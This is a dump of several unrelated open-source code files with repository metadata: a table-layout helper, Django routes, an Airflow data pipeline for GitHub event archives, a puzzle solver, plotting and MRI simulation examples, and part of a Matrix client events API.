math.ceil(\n excess_width * (self.get_avg_content_width(column) / tot_avg_content_width))\n self.set_width(pageindex, column,\n min(max(self.width[pageindex][column] - width_ratio,\n self.width[pageindex][column] - excess_width,\n self.width[pageindex][column] + linesize - sum(\n [self.width[pageindex][column] + self.spacing[column] for column\n in\n columns]),\n self.get_pref_min_width(column),\n self.get_pref_width(column) if any(\n self.width[pageindex][column] > self.get_pref_width(column) for\n column in\n columns) else self.get_pref_min_width(column)),\n linesize - self.spacing[column], self.maxwidth[column]))\n\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n excess_width = tot_used_width - linesize\n\n if excess_width > 0:\n cols1 = columns\n cols2 = tuple()\n\n while excess_width > 0:\n cols2 = (cols1[-1],) + cols2\n cols1 = cols1[:-1]\n tot_used_width = 
sum([self.width[pageindex][column] + self.spacing[column] for column in cols1])\n excess_width = tot_used_width - linesize\n\n maxkey = max(self.pages.keys())\n self.pages[maxkey] = cols1\n self.pages[maxkey + 1] = self.idcols + cols2\n\n self.width[maxkey + 1] = {}\n for column in self.idcols + cols2:\n self.width[maxkey + 1][column] = self.get_pref_width(column)\n self.recurse([cols1, self.idcols + cols2], linesize=linesize, depth=depth + 1)\n return\n\n def calculate_width(self, linesize):\n self.recurse([self.colorder], linesize=linesize, depth=-1)\n return self\n\n # def get_rows(self, pageindex):\n # rows = {}\n # for column in self.pages[pageindex]:\n # for cell in self.columns[column]:\n # cell.print_width = self.width[pageindex][column]\n # if column in rows:\n # rows[column][cell.rowindex] = rows[column].get(cell.rowindex, tuple()) + (cell,)\n # else:\n # rows[column] = {}\n # rows[column][cell.rowindex] = rows[column].get(cell.rowindex, tuple()) + (cell,)\n #\n # #return (Row(*row) for row in zip_longest(*(self.columns[column] for column in self.pages[pageindex])))\n #\n # rowindices = sorted(tuple(set(cell.rowindex for cell in self.cells)))\n #\n # prevlabel = tuple()\n # for index in rowindices:\n # row = tuple()\n # for column in self.pages[pageindex]:\n # row = row + rows[column].get(index, (Cell(None, print_width=self.width[pageindex][column]),))\n #\n # rowlabel = tuple()\n # for cell in row:\n # if cell.label is not None:\n # for label in cell.label:\n # if label not in rowlabel:\n # rowlabel = rowlabel + (label,)\n #\n # if prevlabel != rowlabel:\n # j = 0\n # for i in range(len(rowlabel)):\n # if i < len(prevlabel):\n # if rowlabel[i] != prevlabel[i]:\n # j = i\n # break\n #\n # yield Row(Cell(' ', print_width=1))\n # for i in range(j, len(rowlabel)):\n # yield Row(Cell(rowlabel[i], initial_indent=i*' '))\n #\n # yield Row(*row)\n # prevlabel = rowlabel\n\n def get_header_row(self, pageindex):\n header = tuple()\n\n for column in self.pages[pageindex]:\n label = Cell(self.label[column], print_width=self.width[pageindex][column],\n spacing=self.spacing[column], split=self.split, just=self.header_just[column])\n header = header + (label,)\n\n return Row(*header)\n\n\nclass Row():\n def __init__(self, *cells):\n self.cells = cells\n\n @property\n def max_lines(self):\n return max(cell.max_lines for cell in self.cells)\n\n def __repr__(self):\n return self.cells.__repr__()\n\n def write(self, file, align_bottom=False):\n for i in range(self.max_lines):\n for cell in self.cells:\n if align_bottom:\n if self.max_lines == cell.max_lines:\n cell.write_line(i, file)\n else:\n cell.write_line(i - cell.max_lines, file)\n else:\n cell.write_line(i, file)\n\n file.write('\\n')\n\n\nclass RowLabel():\n def __init__(self, *labels, print_index=0):\n self._labels = labels\n self.print_index = print_index\n\n def __repr__(self):\n self.labels.__repr__()\n\n @property\n def labels(self):\n return (Cell(label, print_width=90) for label in self._labels)\n\n @labels.setter\n def labels(self, value):\n self._labels = tuple(value)\n\n @property\n def max_lines(self):\n return sum(label.max_lines for i, label in enumerate(self.labels) if i >= self.print_index)\n\n def write(self, file):\n for i, label in enumerate(self.labels):\n if i >= self.print_index:\n label.initial_indent = i*' '\n label.write(file)\n\n # file.write('\\n')\n\n\nclass RowGroup:\n def __init__(self, *rows, rowlabel):\n self.rows = rows\n self.rowlabel = rowlabel\n\n @property\n def max_lines(self):\n return 
sum(row.max_lines for row in self.rows) + self.rowlabel.max_lines\n\n# import lorem\n# testcells = ()\n# for column in ('a','b','c'):\n# for row in range(10):\n# testcells = testcells + (Cell(lorem.sentence(), colindex=column, rowindex=row),)\n#\n# testcolumn=Columns(*testcells, colorder=('a','b','c'), linesize=145, wrap=True, minwidth=40).calculate_width()\n# print(testcolumn.pages)\n","repo_name":"satish-ghadigaonkar/report","sub_path":"src/Column.py","file_name":"Column.py","file_ext":"py","file_size_in_byte":22936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7844635376","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name='index'),\n path(\"index\", views.index, name='index'),\n path(\"courses/upload\", views.course_create, name='course_create'),\n path(\"courses/\", views.courses, name='courses'),\n path(\"course_details/\", views.course_details, name='course_details'),\n path(\"profile/\", views.profile, name='profile'), \n path(\"elements\", views.elements, name='elements'), \n path(\"contact\", views.contact, name='contact'), \n path(\"login\", views.login_view, name='login'), \n path(\"logout\", views.logout_view, name='logout'), \n path(\"register\", views.register, name='register'), \n]\n","repo_name":"AndreiLesi/course_webProgramming","sub_path":"Projekt_5/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75009330346","text":"from airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators import PostgresOperator\nfrom airflow.contrib.operators.spark_submit_operator import SparkSubmitOperator\nfrom airflow.operators.git_plugin import StageToRedshiftOperator\nfrom airflow.operators.git_plugin import (LoadDimensionOperator, LoadDictOperator, LoadFactOperator)\nfrom airflow.models import Variable\nimport airflow.hooks.S3_hook\nfrom helpers import SqlQueries\nimport configparser\nimport urllib.request\nimport boto3\nimport datetime\nimport logging\nimport sys\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read('airflow_param.cfg')\nhome_dir = os.getcwd()\n\ndef download_data(*args, **kwargs):\n\n execution_date = kwargs[\"execution_date\"]\n year = execution_date.year\n month = execution_date.month\n day = execution_date.day-1\n date = '{}-{}-{}'.format(year, month, str(day).zfill(2))\n\n cur_dir = os.getcwd()\n wd = '{}/{}'.format(cur_dir, date)\n if not os.path.isdir(wd):\n os.mkdir(wd)\n os.chdir(wd)\n\n opener = urllib.request.URLopener()\n opener.addheader('User-Agent', 'whatever')\n for i in range(0, 24):\n url = 'http://data.gharchive.org/{}-{}.json.gz'.format(date, i)\n filename = '{}-{}.gz'.format(date, i)\n try:\n filename, headers = opener.retrieve(url, filename)\n except Exception as exc:\n logging.info('There was a problem for day %s hour %s: %s ' % (day, i, exc))\n\n Variable.set('year', year)\n Variable.set('month', month)\n Variable.set('day', day)\n\n logging.info('******* Data downloading ended. 
*******')\n\ndef upload_file_to_S3_with_hook(*args, **kwargs):\n\n    execution_date = kwargs[\"execution_date\"]\n    year = execution_date.year\n    month = execution_date.month\n    day = execution_date.day-1\n    date = '{}-{}-{}'.format(year, month, str(day).zfill(2))\n\n    local_directory = home_dir + '/git_' + date + '.parquet'\n    destination = 'git_' + date + '.parquet'\n\n    s3_conn = config.get(\"S3\", \"CONNECTION\")\n    s3_bucket = config.get(\"S3\", \"BUCKET\")\n    hook = airflow.hooks.S3_hook.S3Hook(s3_conn)\n\n    for root, dirs, files in os.walk(local_directory):\n        for filename in files:\n            local_path = os.path.join(root, filename)\n            relative_path = os.path.relpath(local_path, local_directory)\n            s3_path = os.path.join(destination, relative_path)\n            hook.load_file(local_path, s3_path, s3_bucket) \n\ndag = DAG('Git_pipeline',\n        schedule_interval = '@daily',\n        start_date = datetime.datetime.now() - datetime.timedelta(days=1),\n        description = 'Pipeline to download, process and load git data from web to redshift',\n        max_active_runs = 1\n        )\n\nstart_operator = DummyOperator(\n    task_id = 'begin_execution', \n    dag = dag\n    )\n\ndownload_git_data = PythonOperator(\n    task_id = \"download_git_data\",\n    python_callable = download_data,\n    dag = dag,\n    provide_context = True\n    )\n\nspark_config = {\n    'conn_id': config.get('HOST', 'SPARK_CONN'),\n    'application': config.get('HOST', 'SPARK_APP')\n    }\n\nspark_process = SparkSubmitOperator(\n    task_id = \"spark_submit\",\n    dag = dag,\n    **spark_config\n    )\n\ndel_json_task = BashOperator(\n    task_id = \"delete_old_data\",\n    bash_command = 'rm -r '+ home_dir + '/\"{{ (execution_date - macros.timedelta(days=3)).strftime(\"%Y-%m-%d\") }}\"',\n    dag = dag,\n    )\n\ndel_crc_task = BashOperator(\n    task_id = \"delete_crc_data\",\n    bash_command = 'find '+ home_dir + '/git_{{ (execution_date - macros.timedelta(days=2)).strftime(\"%Y-%m-%d\") }}.parquet/ -name \"*.crc\" -exec rm \\'{}\\' \\;',\n    dag = dag,\n    )\n\ndel_suc_task = BashOperator(\n    task_id = \"delete_success_data\",\n    bash_command = 'rm -r ' + home_dir + '/git_{{ (execution_date - macros.timedelta(days=2)).strftime(\"%Y-%m-%d\") }}.parquet/_SUCCESS',\n    dag = dag,\n    )\n\nupload_to_S3_task = PythonOperator(\n    task_id = 'upload_parquet_to_S3',\n    python_callable = upload_file_to_S3_with_hook,\n    dag = dag,\n    provide_context = True)\n\ncreate_main_tables = PostgresOperator(\n    task_id = \"create_main_tables\",\n    dag = dag,\n    postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n    sql = \"create_main_tables.sql\"\n    )\n\ncreate_stage_tables = PostgresOperator(\n    task_id = \"create_stage_tables\",\n    dag = dag,\n    postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n    sql = \"create_stage_tables.sql\"\n    )\n\nstage_events_dict_to_redshift = StageToRedshiftOperator(\n    task_id = 'staging_events_dict_copy',\n    redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n    aws_credentials_id = config.get(\"AWS\", \"CREDENTIALS\"),\n    table = 'events_dict_staging',\n    s3_bucket = config.get(\"S3\", \"BUCKET\"),\n    s3_key = 'events.csv',\n    region = 'us-east-1',\n    format = 'csv',\n    dag = dag\n    )\n\nyear = Variable.get('year')\nmonth = Variable.get('month')\nday = int(Variable.get('day'))\ndate = '{}-{}-{}'.format(year, month, str(day).zfill(2))\nkey = 'git_' + date + '.parquet'\n\nstage_events_to_redshift = StageToRedshiftOperator(\n    task_id = 'staging_events_copy',\n    redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n    aws_credentials_id = config.get(\"AWS\", \"CREDENTIALS\"),\n    table = 'events_staging',\n    s3_bucket = config.get(\"S3\", \"BUCKET\"),\n    s3_key = 
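# Reviewer note (assumption, not in the original source): `key` below is the\n    # module-level 'git_<date>.parquet' prefix built from the Airflow Variables that\n    # download_data sets, so this COPY should target the parquet files pushed to S3\n    # by upload_file_to_S3_with_hook for the same date.\n    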
key,\n region = 'us-east-1',\n format = 'parquet',\n dag = dag\n )\n\nload_actor_dimension_table = LoadDimensionOperator(\n task_id = 'load_actor_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'actors',\n select_sql = SqlQueries.actor_staging_table_insert,\n key1 = 'actor_id',\n key2 = 'actor_login',\n dag = dag\n )\n\nload_repo_dimension_table = LoadDimensionOperator(\n task_id = 'load_repo_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'repos',\n select_sql = SqlQueries.repo_staging_table_insert,\n key1 = 'repo_id',\n key2 = 'repo_name',\n dag = dag\n )\n\nload_dict_dimension_table = LoadDictOperator(\n task_id = 'load_dict_dim_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'events_dict',\n select_sql = SqlQueries.event_dict_staging_table_insert,\n key = 'event',\n dag = dag\n )\n\nload_events_table = LoadFactOperator(\n task_id = 'load_events_fact_table',\n redshift_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n table = 'events',\n insert_sql = SqlQueries.event_table_insert,\n dag = dag\n )\n\ndrop_stage_tables = PostgresOperator(\n task_id = \"drop_stage_tables\",\n dag = dag,\n postgres_conn_id = config.get(\"REDSHIFT\", \"CONNECTION\"),\n sql = \"drop_stage_tables.sql\"\n )\n\nend_operator = DummyOperator(\n task_id = 'stop_execution', \n dag = dag\n )\n\nstart_operator >> download_git_data >> spark_process \nspark_process >> del_crc_task >> upload_to_S3_task\nspark_process >> del_suc_task >> upload_to_S3_task\nupload_to_S3_task >> create_main_tables >> create_stage_tables\ncreate_stage_tables >> stage_events_dict_to_redshift >> stage_events_to_redshift\nstage_events_to_redshift >> load_actor_dimension_table >> load_events_table\nstage_events_to_redshift >> load_repo_dimension_table >> load_events_table\nstage_events_to_redshift >> load_dict_dimension_table >> load_events_table\nload_events_table >> drop_stage_tables >> end_operator \nload_events_table >> del_json_task >> end_operator ","repo_name":"liber1320/github_events","sub_path":"airflow/dags/github_dag.py","file_name":"github_dag.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618043573","text":"N = int(input())\r\n\r\narr = [[\"\"]*N for _ in range(N)]\r\nS = input()\r\nidx = len(S)-1\r\nfor i in range(N):\r\n for j in range(0, i+1):\r\n arr[i][j] = S[idx]\r\n idx -= 1\r\n\r\nstack = []\r\nprefix = []\r\n\r\ndef Check(l):\r\n for i in range(0, l+1):\r\n a = prefix[l]\r\n if i > 0:\r\n a -= prefix[i-1]\r\n if (arr[l][i] == '+' and a <= 0) or (arr[l][i] == '-' and a >= 0) or (arr[l][i] == '0' and a != 0):\r\n return False\r\n return True\r\n\r\n\r\ndef BT(l):\r\n if l == N:\r\n for i in range(N):\r\n print(stack.pop(), end = \" \")\r\n exit()\r\n for num in range(-10, 11):\r\n if len(prefix) > 0:\r\n prefix.append(prefix[-1] + num)\r\n else:\r\n prefix.append(num)\r\n if Check(l) == False:\r\n prefix.pop()\r\n continue\r\n stack.append(num)\r\n BT(l+1)\r\n stack.pop()\r\n prefix.pop()\r\nBT(0)\r\n\r\n\r\n","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/1248. 
Guess/Guess.py","file_name":"Guess.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74938178988","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n# Prevent matplotlib from garbling Chinese characters\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n\ndef read_csv(file):\n    \"\"\"\n    Read a CSV file; multiple attributes are allowed, and the last column is the target attribute\n    Input args:\n        file: file name\n    Returns:\n        x: attributes, y: target attribute\n    \"\"\"\n    with open(file, encoding=\"utf-8\") as fr:\n        fr.readline()  # skip the header line\n        content = fr.readlines()\n    x = [f.split(\",\")[: -1] for f in content]\n    y = [f.split(\",\")[-1].strip(\"\\n\") for f in content]\n    return x, y\n\n\ndef main():\n    # Load the iris data\n    file_path = \"../data/fisheriris.csv\"\n    x, y = read_csv(file_path)\n    x = [float(f[0]) for f in x]\n    s1 = x[0: 50]\n    s2 = x[50: 100]\n    s3 = x[100: 150]\n    plt.figure()\n    plt.boxplot(np.column_stack((s1, s2, s3)), labels=['setosa', 'versicolor', 'virginica'], notch=True, sym='r+')\n    plt.show()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"imcyx/UESTC-CYXBackup","sub_path":"模式识别/参考课件/086437-01/ML-Python/ch1Introduction/percentiles.py","file_name":"percentiles.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174197145","text":"'''Example of ellipse rotations.'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mr_utils.sim.ssfp import ssfp\nfrom mr_utils.utils import do_planet_rotation\n\nif __name__ == '__main__':\n\n    # We know SSFP signal will make an ellipse!\n    lpcs = 16\n    pcs = np.linspace(0, 2*np.pi, lpcs, endpoint=False)\n    TR, alpha = 6e-3, np.deg2rad(70)\n    T1, T2, df = .6, 1.2, 100\n\n    # Simulate phase cycles\n    sigma = .1/2\n    I = np.zeros(lpcs, dtype='complex')\n    for ii, pc in enumerate(pcs):\n        I[ii] = ssfp(T1, T2, TR, alpha, df, pc, M0=1) \\\n            + np.random.normal(0, sigma) + 1j*np.random.normal(0, sigma)\n\n    # Now find the correct rotation\n    xr, yr, cr, phi = do_planet_rotation(I)\n\n    plt.plot(I.real, I.imag, '.-')\n    plt.plot(xr, yr, '.--')\n    plt.show()\n","repo_name":"mckib2/mr_utils","sub_path":"examples/utils/rotate_ellipse.py","file_name":"rotate_ellipse.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"3688149526","text":"from typing import Awaitable, Dict, Optional, List\n\nfrom ...api import Method, JSON, Path\nfrom ...errors import MatrixResponseError\nfrom .types import (UserID, RoomID, EventID, FilterID, SyncToken, PaginationDirection, StateEvent,\n                    EventType, StateEventContent, MessageEventContent, Member, Event, ContentURI,\n                    PaginatedMessages, SerializerError, MessageType, RelatesTo, Format, ImageInfo,\n                    BaseFileInfo, TextMessageEventContent, MediaMessageEventContent, PresenceState,\n                    EventContent, ReactionEventContent, RelationType)\nfrom .types.event.state import state_event_content_map\nfrom .types.util import Obj, Serializable\nfrom .base import BaseClientAPI\n\n\nclass EventMethods(BaseClientAPI):\n    \"\"\"\n    Methods in section 8 Events of the spec. Includes ``/sync``ing, getting messages and state,\n    setting state, sending messages and redacting messages. See also: `Events API reference`_\n\n    .. 
_Events API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#events\n \"\"\"\n\n # region 8.2 Syncing\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#syncing\n\n def sync(self, since: SyncToken = None, timeout: int = 30000, filter_id: FilterID = None,\n full_state: bool = False, set_presence: PresenceState = None) -> Awaitable[JSON]:\n \"\"\"\n Perform a sync request. See also: `/sync API reference`_\n\n Args:\n since (str): Optional. A token which specifies where to continue a sync from.\n timeout (int): Optional. The time in milliseconds to wait.\n filter_id (int): A filter ID.\n full_state (bool): Return the full state for every room the user has joined\n Defaults to false.\n set_presence (str): Should the client be marked as \"online\" or\" offline\"\n\n .. _/sync API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-sync\n \"\"\"\n request = {\"timeout\": timeout}\n if since:\n request[\"since\"] = str(since)\n if filter_id:\n request[\"filter\"] = str(filter_id)\n if full_state:\n request[\"full_state\"] = \"true\" if full_state else \"false\"\n if set_presence:\n request[\"set_presence\"] = str(set_presence)\n return self.api.request(Method.GET, Path.sync, query_params=request)\n\n # endregion\n # region 8.3 Getting events for a room\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#getting-events-for-a-room\n\n async def get_event(self, room_id: RoomID, event_id: EventID) -> Event:\n \"\"\"\n Get a single event based on ``room_id``/``event_id``. You must have permission to retrieve\n this event e.g. by being a member in the room for this event.\n See also: `/event/{eventId} API reference`_\n\n Args:\n room_id: The ID of the room the event is in.\n event_id: The event ID to get.\n\n Returns:\n The event.\n\n .. _/event/{eventId} API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-event-eventid\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].event[event_id])\n try:\n return Event.deserialize(content)\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid event in response\") from e\n\n async def get_state_event(self, room_id: RoomID, event_type: EventType,\n state_key: Optional[str] = None) -> StateEventContent:\n \"\"\"\n Looks up the contents of a state event in a room. If the user is joined to the room then the\n state is taken from the current state of the room. If the user has left the room then the\n state is taken from the state of the room when they left.\n See also: `GET /state/{eventType}/{stateKey} API reference`_\n\n Args:\n room_id: The ID of the room to look up the state in.\n event_type: The type of state to look up.\n state_key: The key of the state to look up. Defaults to empty string.\n\n Returns:\n The state event.\n\n .. _GET /state/{eventType}/{stateKey} API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-state-eventtype-statekey\n \"\"\"\n content = await self.api.request(Method.GET,\n Path.rooms[room_id].state[event_type][state_key])\n try:\n return state_event_content_map[event_type].deserialize(content)\n except KeyError:\n return Obj(**content)\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state event in response\") from e\n\n async def get_state(self, room_id: RoomID) -> List[StateEvent]:\n \"\"\"\n Get the state events for the current state of a room. 
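A minimal usage sketch (hypothetical, not from the upstream docs; ``client`` and\n        ``room_id`` stand for an initialized client and a room the user has joined):\n\n        .. code-block:: python\n\n            state = await client.get_state(room_id)\n            for evt in state:\n                print(evt.type, evt.state_key)\n\n        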
See also: `/state API reference`_\n\n Args:\n room_id: The ID of the room to look up the state for.\n\n Returns:\n A list of state events with the most recent of each event_type/state_key pair.\n\n .. _/state API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-state\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].state)\n try:\n return [StateEvent.deserialize(event) for event in content]\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state events in response\") from e\n\n async def get_members(self, room_id: RoomID) -> List[StateEvent]:\n \"\"\"\n Get the list of members for a room. See also: `/members API reference`_\n\n Args:\n room_id: The ID of the room to get the member events for.\n\n Returns:\n A list of most recent member events for each user.\n\n .. _/members API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-members\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].members)\n try:\n return [StateEvent.deserialize(event) for event in content[\"chunk\"]]\n except KeyError:\n raise MatrixResponseError(\"`chunk` not in response.\")\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid state events in response\") from e\n\n async def get_joined_members(self, room_id: RoomID) -> Dict[UserID, Member]:\n \"\"\"\n Get a user ID -> member info map for a room. The current user must be in the room for it to\n work, unless it is an Application Service in which case any of the AS's users must be in the\n room. This API is primarily for Application Services and should be faster to respond than\n `/members`_ as it can be implemented more efficiently on the server.\n See also: `/joined_members API reference`_\n\n Args:\n room_id: The ID of the room to get the members of.\n\n Returns:\n A dictionary from user IDs to Member info objects.\n\n .. _/joined_members API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-joined-members\n .. _/members:\n https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-members\n \"\"\"\n content = await self.api.request(Method.GET, Path.rooms[room_id].joined_members)\n try:\n return {user_id: Member.deserialize(event)\n for user_id, event in content[\"joined\"].items()}\n except KeyError:\n raise MatrixResponseError(\"`joined` not in response.\")\n except SerializerError as e:\n raise MatrixResponseError(\"Invalid member objects in response\") from e\n\n async def get_messages(self, room_id: RoomID, direction: PaginationDirection,\n from_token: SyncToken, to_token: Optional[SyncToken] = None,\n limit: Optional[int] = None, filter_json: Optional[str] = None\n ) -> PaginatedMessages:\n \"\"\"\n Get a list of message and state events for a room. Pagination parameters are used to\n paginate history in the room. See also: `/messages API reference`_\n\n Args:\n room_id: The ID of the room to get events from.\n direction: The direction to return events from.\n from_token: The token to start returning events from. This token can be obtained from a\n ``prev_batch`` token returned for each room by the `sync endpoint`_, or from a\n ``start`` or ``end`` token returned by a previous request to this endpoint.\n to_token: The token to stop returning events at.\n limit: The maximum number of events to return. Defaults to 10.\n filter_json: A JSON RoomEventFilter_ to filter returned events with.\n\n Returns:\n\n .. 
_RoomEventFilter:\n            https://matrix.org/docs/spec/client_server/r0.5.0#filtering\n        .. _sync endpoint:\n            https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-sync\n        .. _/messages API reference:\n            https://matrix.org/docs/spec/client_server/r0.5.0#get-matrix-client-r0-rooms-roomid-messages\n        \"\"\"\n        query_params = {\n            \"from\": from_token,\n            \"dir\": direction.value,\n        }\n        if to_token:\n            query_params[\"to\"] = to_token\n        if limit:\n            query_params[\"limit\"] = str(limit)\n        if filter_json:\n            query_params[\"filter\"] = filter_json\n        content = await self.api.request(Method.GET, Path.rooms[room_id].messages,\n                                         query_params=query_params)\n        try:\n            return PaginatedMessages(content[\"start\"], content[\"end\"],\n                                     [Event.deserialize(event) for event in content[\"chunk\"]])\n        except KeyError:\n            if \"start\" not in content:\n                raise MatrixResponseError(\"`start` not in response.\")\n            elif \"end\" not in content:\n                raise MatrixResponseError(\"`end` not in response.\")\n            raise MatrixResponseError(\"`chunk` not in response.\")\n        except SerializerError as e:\n            raise MatrixResponseError(\"Invalid events in response\") from e\n\n    # endregion\n    # region 8.4 Sending events to a room\n    # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#sending-events-to-a-room\n\n    async def send_state_event(self, room_id: RoomID, event_type: EventType,\n                               content: StateEventContent, state_key: Optional[str] = \"\", **kwargs\n                               ) -> EventID:\n        \"\"\"\n        Send a state event to a room. State events with the same ``room_id``, ``event_type`` and\n        ``state_key`` will be overridden.\n        See also: `PUT /state/{eventType}/{stateKey} API reference`_\n\n        Args:\n            room_id: The ID of the room to set the state in.\n            event_type: The type of state to send.\n            content: The content to send.\n            state_key: The key for the state to send. Defaults to empty string.\n            **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n                :class:`IntentAPI` to pass the timestamp massaging field to\n                :meth:`AppServiceAPI.request`.\n\n        Returns:\n            The ID of the event that was sent.\n\n        .. _PUT /state/{eventType}/{stateKey} API reference:\n            https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-state-eventtype-statekey\n        \"\"\"\n        content = content.serialize() if isinstance(content, Serializable) else content\n        resp = await self.api.request(Method.PUT, Path.rooms[room_id].state[event_type][state_key],\n                                      content, **kwargs)\n        try:\n            return resp[\"event_id\"]\n        except KeyError:\n            raise MatrixResponseError(\"`event_id` not in response.\")\n\n    async def send_message_event(self, room_id: RoomID, event_type: EventType,\n                                 content: EventContent, **kwargs) -> EventID:\n        \"\"\"\n        Send a message event to a room. Message events allow access to historical events and\n        pagination, making them suited for \"once-off\" activity in a room.\n        See also: `/send API reference`_\n\n        Args:\n            room_id: The ID of the room to send the message to.\n            event_type: The type of message to send.\n            content: The content to send.\n            **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n                :class:`IntentAPI` to pass the timestamp massaging field to\n                :meth:`AppServiceAPI.request`.\n\n        Returns:\n            The ID of the event that was sent.\n\n        .. 
_/send API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-send-eventtype-txnid\n \"\"\"\n if not room_id:\n raise ValueError(\"Room ID not given\")\n elif not event_type:\n raise ValueError(\"Event type not given\")\n url = Path.rooms[room_id].send[event_type][self.api.get_txn_id()]\n content = content.serialize() if isinstance(content, Serializable) else content\n resp = await self.api.request(Method.PUT, url, content, **kwargs)\n try:\n return resp[\"event_id\"]\n except KeyError:\n raise MatrixResponseError(\"`event_id` not in response.\")\n\n # region Message send helper functions\n def send_message(self, room_id: RoomID, content: MessageEventContent, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send a message to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n content: The content to send.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message_event(room_id, EventType.ROOM_MESSAGE, content, **kwargs)\n\n def react(self, room_id: RoomID, event_id: EventID, key: str) -> Awaitable[EventID]:\n # TODO make this use the send_relation API instead.\n content = ReactionEventContent(relates_to=RelatesTo(rel_type=RelationType.ANNOTATION,\n event_id=event_id, key=key))\n return self.send_message_event(room_id, EventType.REACTION, content)\n\n def send_text(self, room_id: RoomID, text: str, html: Optional[str] = None,\n msgtype: MessageType = MessageType.TEXT, relates_to: Optional[RelatesTo] = None,\n **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a text message to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n if html:\n if not text:\n text = html\n content = TextMessageEventContent(msgtype=msgtype, body=text,\n format=Format.HTML, formatted_body=html)\n else:\n content = TextMessageEventContent(msgtype=msgtype, body=text)\n if relates_to:\n content.relates_to = relates_to\n return self.send_message(room_id, content, **kwargs)\n\n def send_notice(self, room_id: RoomID, text: str, html: Optional[str] = None,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a notice text message to a room. Notices are like normal text messages, but usually\n sent by bots to tell other bots not to react to them. If you're a bot, please send notices\n instead of normal text, unless there is a reason to do something else.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. 
